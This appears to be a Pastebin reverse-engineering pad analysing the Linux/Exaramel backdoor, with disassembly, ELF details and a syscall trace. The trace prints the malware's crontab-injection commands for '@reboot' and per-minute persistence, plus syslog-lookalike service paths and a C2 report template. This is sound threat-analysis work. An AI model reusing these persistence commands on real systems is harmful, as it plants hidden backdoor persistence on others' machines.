<!DOCTYPE html>
<html lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Linux/Exaramel backdoor (RE analysis pad) #MalwareMustDie - Pastebin.com</title>
    <link rel="canonical" href="https://pastebin.com/iKyaqLTd" />
</head>
<body class="night-auto " data-pr="x2xy94pJ" data-pa="" data-sar="1" data-abd="1">


<div class="wrap">

        
        
        

    <div class="container">
        <div class="content">

                        

<div class="post-view">

    
    <div class="details">
        <div class="info-bar">
            <div class="info-top">

                                    <span class="unlisted" title="Unlisted paste, only people with this link can see this paste."></span>
                
                
                <h1>Linux/Exaramel backdoor (RE analysis pad) #MalwareMustDie</h1>
            </div>
            <div class="info-bottom">

                                    <div class="username">
                                                    <a href="/u/MalwareMustDie">MalwareMustDie</a>
                                            </div>

                                    
                <div class="date">
                    <span title="Friday 10th of January 2020 03:20:09 AM CDT">Jan 10th, 2020</span>

                                    </div>

            </div>
        </div>
    </div>

        
    
    <div class="highlighted-code">
        <div class="source">
            <ol class="lua"><li class="li1"><div class="de1"><span class="sy0">//</span> Linux<span class="sy0">/</span>Exaramel <span class="br0">&#40;</span>BlackEnergy<span class="br0">&#41;</span> <span class="sy0">-</span> APT ELF malware</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> ref<span class="sy0">:</span> https<span class="sy0">://</span>www<span class="sy0">.</span>virustotal<span class="sy0">.</span>com<span class="sy0">/</span>gui<span class="sy0">/</span>file<span class="sy0">/</span>c39b4105e1b9da1a9cccb1dace730b1c146496c591ce0927fb035d48e9cb5c0f<span class="sy0">/</span>details</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> binary forms <span class="br0">&#40;</span>go<span class="sy0">-</span>lang with <span class="st0">&quot;vendor&quot;</span> installation<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> quick analysis by @unixfreaxjp on radare2 &amp; tsurugi linux seccon</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> <span class="sy0">*</span><span class="br0">&#41;</span> this is ongoing work<span class="sy0">,</span> the contents may change<span class="sy0">.</span> <span class="sy0">#</span>MalwareMustDie! </div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">#</span> Summary &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">#</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0</span><span class="sy0">.</span> Checking<span class="sy0">,</span> cloning<span class="sy0">,</span> <span class="kw2">and</span> initiating run space<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">1</span><span class="sy0">.</span> Use both lock <span class="br0">&#40;</span><span class="sy0">/</span>tmp<span class="sy0">/.</span>applock<span class="br0">&#41;</span> file<span class="br0">&#40;</span>unix socket<span class="br0">&#41;</span> &amp; futex <span class="kw1">for</span> protecting a running instance<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;i<span class="sy0">.</span>e<span class="sy0">.</span> new bins instance will be exusted due to lock file<span class="sy0">,</span> dups clones controlled by futex</div></li>
<li class="li1"><div class="de1"><span class="nu0">2</span><span class="sy0">.</span> Aim persistence <span class="kw2">in</span> cron &amp; systemd startup<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">3</span><span class="sy0">.</span> Read encrypted config file<span class="sy0">,</span> <span class="kw1">if</span> <span class="kw2">not</span> exist drop hardcoded crypt one<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">4</span><span class="sy0">.</span> Grab information &amp; fills the template <span class="kw1">for</span> C2 callbacks<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">5</span><span class="sy0">.</span> C2 establishment<span class="sy0">,</span> sending information after <span class="kw3">read</span> config <span class="kw2">and</span> start listening<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">6</span><span class="sy0">.</span> Host resolving uses libnss<span class="sy0">;</span> Networking supports system proxy<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">7</span><span class="sy0">.</span> Supports remote command execution<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">8</span><span class="sy0">.</span> My opinion<span class="sy0">:</span> this is work made by a developer<span class="sy0">,</span> <span class="kw2">not</span> by crooks<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">9</span><span class="sy0">.</span> Comments<span class="sy0">:</span> https<span class="sy0">://</span>twitter<span class="sy0">.</span>com<span class="sy0">/</span>malwaremustd1e<span class="sy0">/</span>status<span class="sy0">/</span><span class="nu0">1216466744446840837</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">#</span> Binary Analysis &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">#</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">1</span><span class="sy0">.</span> Machine<span class="sy0">:</span> Advanced Micro Devices X86<span class="sy0">-</span><span class="nu0">64</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">2</span><span class="sy0">.</span> Symbol <span class="kw3">table</span> <span class="st0">'.symtab'</span> contains <span class="nu0">7726</span> entries<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">3</span><span class="sy0">.</span> go build ID</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00400fd8</span> &nbsp;<span class="nu0">3133</span> <span class="nu0">3631</span> <span class="nu0">3236</span> <span class="nu0">3730</span> <span class="nu0">3763</span> <span class="nu0">6466</span> <span class="nu0">3136</span> <span class="nu0">6364</span> &nbsp;136126707cdf16cd</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00400fe8</span> &nbsp;<span class="nu0">6133</span> <span class="nu0">3231</span> <span class="nu0">3562</span> <span class="nu0">6561</span> <span class="nu0">6435</span> <span class="nu0">3833</span> <span class="nu0">6331</span> <span class="nu0">6665</span> &nbsp;a3215bead583c1fe</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00400ff8</span> &nbsp;<span class="nu0">3765</span> <span class="nu0">3237</span> <span class="nu0">3530</span> <span class="nu0">3636</span> 48c7 <span class="nu0">4424</span> <span class="nu0">1000</span> <span class="nu0">0000</span> &nbsp;7e275066H<span class="sy0">.</span>D$<span class="sy0">....</span></div></li>
<li class="li1"><div class="de1">Notes at offset <span class="nu0">0x00000fc8</span> with length <span class="nu0">0x00000038</span><span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp; Owner &nbsp; &nbsp; &nbsp; &nbsp; Data size &nbsp; &nbsp; &nbsp; Description</div></li>
<li class="li1"><div class="de1">&nbsp; Go &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x00000028</span> &nbsp; &nbsp; &nbsp;Unknown note <span class="kw3">type</span><span class="sy0">:</span> <span class="br0">&#40;</span><span class="nu0">0x00000004</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">4</span><span class="sy0">.</span> Program Headers<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp; Type &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Offset &nbsp; VirtAddr &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; PhysAddr &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; FileSiz &nbsp;MemSiz &nbsp; Flg Align</div></li>
<li class="li1"><div class="de1">&nbsp; PHDR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x000040</span> <span class="nu0">0x0000000000400040</span> <span class="nu0">0x0000000000400040</span> <span class="nu0">0x000188</span> <span class="nu0">0x000188</span> R &nbsp; <span class="nu0">0x1000</span></div></li>
<li class="li1"><div class="de1">&nbsp; NOTE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x000fc8</span> <span class="nu0">0x0000000000400fc8</span> <span class="nu0">0x0000000000400fc8</span> <span class="nu0">0x000038</span> <span class="nu0">0x000038</span> R &nbsp; <span class="nu0">0x4</span></div></li>
<li class="li1"><div class="de1">&nbsp; LOAD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x000000</span> <span class="nu0">0x0000000000400000</span> <span class="nu0">0x0000000000400000</span> <span class="nu0">0x248c80</span> <span class="nu0">0x248c80</span> R E <span class="nu0">0x1000</span></div></li>
<li class="li1"><div class="de1">&nbsp; LOAD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x249000</span> <span class="nu0">0x0000000000649000</span> <span class="nu0">0x0000000000649000</span> <span class="nu0">0x1ac10f</span> <span class="nu0">0x1ac10f</span> R &nbsp; <span class="nu0">0x1000</span></div></li>
<li class="li1"><div class="de1">&nbsp; LOAD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x3f6000</span> <span class="nu0">0x00000000007f6000</span> <span class="nu0">0x00000000007f6000</span> <span class="nu0">0x02f7e0</span> <span class="nu0">0x052400</span> RW &nbsp;<span class="nu0">0x1000</span></div></li>
<li class="li1"><div class="de1">&nbsp; GNU_STACK &nbsp; &nbsp; &nbsp;<span class="nu0">0x000000</span> <span class="nu0">0x0000000000000000</span> <span class="nu0">0x0000000000000000</span> <span class="nu0">0x000000</span> <span class="nu0">0x000000</span> RW &nbsp;<span class="nu0">0x8</span></div></li>
<li class="li1"><div class="de1">&nbsp; LOOS<span class="sy0">+</span><span class="nu0">5041580</span> &nbsp; <span class="nu0">0x000000</span> <span class="nu0">0x0000000000000000</span> <span class="nu0">0x0000000000000000</span> <span class="nu0">0x000000</span> <span class="nu0">0x000000</span> &nbsp; &nbsp; <span class="nu0">0x8</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">5</span><span class="sy0">.</span> Go version v1<span class="sy0">.</span>8 <span class="br0">&#40;</span>see the embedded toolchain path below<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">/</span>usr<span class="sy0">/</span>lib<span class="sy0">/</span>go<span class="sy0">-</span><span class="nu0">1.8</span><span class="sy0">/</span>lib<span class="sy0">/</span><span class="kw3">time</span><span class="sy0">/</span>zoneinfo<span class="sy0">.</span>zip</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">#</span> Static Reversing Analysis &nbsp; <span class="sy0">#</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00455940</span><span class="br0">&#93;</span><span class="sy0">&gt;</span> pdf</div></li>
<li class="li1"><div class="de1">┌ <span class="nu0">18</span><span class="sy0">:</span> entry0 <span class="br0">&#40;</span>int64_t arg_8h<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span> arg int64_t arg_8h @ rsp<span class="sy0">+</span><span class="nu0">0x8</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00455940</span> &nbsp; &nbsp; &nbsp;488d742408 &nbsp; &nbsp; lea rsi<span class="sy0">,</span> <span class="br0">&#91;</span>arg_8h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00455945</span> &nbsp; &nbsp; &nbsp;488b3c24 &nbsp; &nbsp; &nbsp; mov rdi<span class="sy0">,</span> qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00455949</span> &nbsp; &nbsp; &nbsp;488d05100000<span class="sy0">.</span> &nbsp;lea rax<span class="sy0">,</span> <span class="br0">&#91;</span>main<span class="br0">&#93;</span> <span class="sy0">;</span> sym<span class="sy0">.</span>go<span class="sy0">.</span>main</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span> <span class="nu0">0x455960</span> <span class="sy0">;</span> <span class="st0">&quot;H\x8d\x05\x89\xc2\xff\xff\xff\xe0\xcc\xcc\xcc\xcc\xcc\xcc\u030b|$<span class="es1">\b</span>\xb8\xe7&quot;</span></div></li>
<li class="li1"><div class="de1">└ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00455950</span> &nbsp; &nbsp; &nbsp;ffe0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jmp rax</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00455940</span><span class="br0">&#93;</span><span class="sy0">&gt;</span> s sym<span class="sy0">.</span>main<span class="sy0">.</span>main</div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00647540</span><span class="br0">&#93;</span><span class="sy0">&gt;</span> pd <span class="nu0">6</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>main<span class="sy0">.</span>main @ <span class="nu0">0x648803</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="co1">-- sym.go.main.main:</span></div></li>
<li class="li1"><div class="de1">┌ <span class="nu0">4808</span><span class="sy0">:</span> sym<span class="sy0">.</span>main<span class="sy0">.</span>main <span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">│ bp<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">│ sp<span class="sy0">:</span> <span class="nu0">105</span> <span class="br0">&#40;</span>vars <span class="nu0">105</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">│ rg<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00647540</span> &nbsp; &nbsp; &nbsp;64488b0c25f8<span class="sy0">.</span> &nbsp;mov rcx<span class="sy0">,</span> qword fs<span class="sy0">:</span><span class="br0">&#91;</span><span class="nu0">0xfffffffffffffff8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00647549</span> &nbsp; &nbsp; &nbsp;488d842408fc<span class="sy0">.</span> &nbsp;lea rax<span class="sy0">,</span> <span class="br0">&#91;</span>rsp <span class="sy0">-</span> <span class="nu0">0x3f8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00647551</span> &nbsp; &nbsp; &nbsp;483b4110 &nbsp; &nbsp; &nbsp; cmp rax<span class="sy0">,</span> qword <span class="br0">&#91;</span>rcx <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; ┌─<span class="sy0">&lt;</span> <span class="nu0">0x00647555</span> &nbsp; &nbsp; &nbsp;0f86a3120000 &nbsp; jbe <span class="nu0">0x6487fe</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; │ &nbsp; &nbsp;<span class="nu0">0x0064755b</span> &nbsp; &nbsp; &nbsp;4881ec780400<span class="sy0">.</span> &nbsp;sub rsp<span class="sy0">,</span> <span class="nu0">0x478</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; │ &nbsp; &nbsp;<span class="nu0">0x00647562</span> &nbsp; &nbsp; &nbsp;4889ac247004<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span>var_470h<span class="br0">&#93;</span><span class="sy0">,</span> rbp</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00647540</span><span class="br0">&#93;</span><span class="sy0">&gt;</span> pdsf</div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span><span class="co1">-- sym.go.main.main: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647572</span> <span class="kw3">call</span> sym<span class="sy0">.</span>main<span class="sy0">.</span>getCurrentDir</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006475b4</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>concatstring2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006475d0</span> <span class="kw3">call</span> sym<span class="sy0">.</span><span class="kw3">time</span><span class="sy0">.</span>Now</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647618</span> <span class="kw3">call</span> sym<span class="sy0">.</span><span class="kw3">time</span><span class="sy0">.</span>Time<span class="sy0">.</span><span class="kw5">String</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x0064768a</span> <span class="kw3">call</span> sym<span class="sy0">.</span>net<span class="sy0">.</span>Listen</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006476d0</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>makechan</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647727</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454c1d fcn<span class="sy0">.</span>00454c1d</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006477ba</span> <span class="kw3">call</span> sym<span class="sy0">.</span>os_signal<span class="sy0">.</span>Notify</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006477f9</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newproc</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x0064783c</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x0064787c</span> <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_configur<span class="sy0">.</span>LoadConfig</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647905</span> obj<span class="sy0">.</span>main<span class="sy0">.</span>defaulthost<span class="sy0">.</span>str <span class="sy0">//</span> <span class="sy0">&lt;======</span> C2 placeholder var</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647968</span> <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_configur<span class="sy0">.</span>UpdateConfig</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647981</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>makechan</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006479a7</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>makechan</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006479cd</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>makechan</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006479ea</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647a38</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647a63</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454c20 fcn<span class="sy0">.</span>00454c20</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647af4</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454f96 fcn<span class="sy0">.</span>00454f96</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647b01</span> <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>__Worker_<span class="sy0">.</span>CheckAdapt</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647bbd</span> <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>__Worker_<span class="sy0">.</span>GetUser</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647be8</span> <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>__Worker_<span class="sy0">.</span>GetOS</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647c27</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newproc</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647c51</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454bfa fcn<span class="sy0">.</span>00454bfa</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647c77</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newselect</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647ca2</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>selectrecv</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
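<li class="li1"><div class="de1"><span class="sy0">//</span> <span class="kw3">seek</span> persistence <span class="sy0">#</span><span class="nu0">1</span> <span class="br0">&#40;</span>cron<span class="br0">&#41;</span><span class="sy0">;</span> <span class="sy0">/</span>test<span class="sy0">/</span>Exaramel is presumably the path the sample was run from <span class="kw2">in</span> this test<span class="sy0">,</span> <span class="kw2">not</span> a fixed install path</div></li>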
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">chdir<span class="br0">&#40;</span><span class="st0">&quot;/var/spool/cron&quot;</span><span class="br0">&#41;</span><span class="sy0">,</span> <span class="nu0">1</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">execve<span class="br0">&#40;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="st0">&quot;-c&quot;</span><span class="sy0">,</span> <span class="st0">&quot;(crontab -l 2&gt;/dev/null) | grep /test/Exaramel &amp;&amp; echo 'true' || echo 'false'&quot;</span><span class="br0">&#93;</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">execve<span class="br0">&#40;</span><span class="st0">&quot;/usr/bin/crontab&quot;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="st0">&quot;crontab&quot;</span><span class="sy0">,</span> <span class="st0">&quot;-l&quot;</span><span class="br0">&#93;</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">execve<span class="br0">&#40;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="st0">&quot;-c&quot;</span><span class="sy0">,</span> <span class="st0">&quot;(crontab -l 2&gt;/dev/null; echo '*/1 * * * * /test/Exaramel') | crontab -&quot;</span><span class="br0">&#93;</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">execve<span class="br0">&#40;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="st0">&quot;-c&quot;</span><span class="sy0">,</span> <span class="st0">&quot;(crontab -l 2&gt;/dev/null; echo '@reboot /test/Exaramel') | crontab -&quot;</span><span class="br0">&#93;</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
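<li class="li1"><div class="de1"><span class="sy0">//</span> persistence <span class="sy0">#</span><span class="nu0">2</span> (service files): stat() probes of names resembling the system logger under the rc.d, Upstart, systemd and init.d paths</div></li>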
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">stat<span class="br0">&#40;</span><span class="st0">&quot;/etc/rc.d/syslogger&quot;</span><span class="sy0">,..</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">stat<span class="br0">&#40;</span><span class="st0">&quot;/etc/init/syslogd.conf&quot;</span><span class="sy0">,..</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">stat<span class="br0">&#40;</span><span class="st0">&quot;/etc/systemd/system/syslogd.service&quot;</span><span class="sy0">,..</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">stat<span class="br0">&#40;</span><span class="st0">&quot;/etc/init.d/syslogd&quot;</span><span class="sy0">,..</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> check user</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">execve<span class="br0">&#40;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="st0">&quot;-c&quot;</span><span class="sy0">,</span> <span class="st0">&quot;whoami&quot;</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> hardcoded template used <span class="kw1">for</span> sending data to the C2 (the whoami field presumably carries the output of the whoami call above)<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">generation<span class="sy0">=%</span>d&amp;guid<span class="sy0">=%</span>s&amp;platform<span class="sy0">=%</span>s&amp;version<span class="sy0">=%</span>d&amp;whoami<span class="sy0">=%</span>s<span class="sy0">%</span>0A </div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> run lock file (presumably a single-instance guard): a UNIX domain socket bound at the path below</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="st0">&quot;/tmp/.applock&quot;</span></div></li>
<li class="li1"><div class="de1">code<span class="sy0">:</span> getsockname<span class="br0">&#40;</span><span class="nu0">3</span><span class="sy0">,</span> <span class="br0">&#123;</span>sa_family<span class="sy0">=</span>AF_FILE<span class="sy0">,</span> path<span class="sy0">=</span><span class="st0">&quot;/tmp/.applock&quot;</span><span class="br0">&#125;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="nu0">16</span><span class="br0">&#93;</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> Code execution environment <span class="br0">&#40;</span>the Go os/exec package is initialized<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32676</span> <span class="nu0">16</span> <span class="nu0">15</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>Command</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x32686</span> <span class="nu0">23</span> <span class="nu0">22</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span>interfaceEqual</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x3269d</span> <span class="nu0">20</span> <span class="nu0">19</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>envv</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x326b1</span> <span class="nu0">21</span> <span class="nu0">20</span> <span class="kw3">os</span><span class="sy0">/</span>exec<span class="sy0">.</span><span class="br0">&#40;</span><span class="sy0">*</span>Cmd<span class="br0">&#41;</span><span class="sy0">.</span>stdin</div></li>
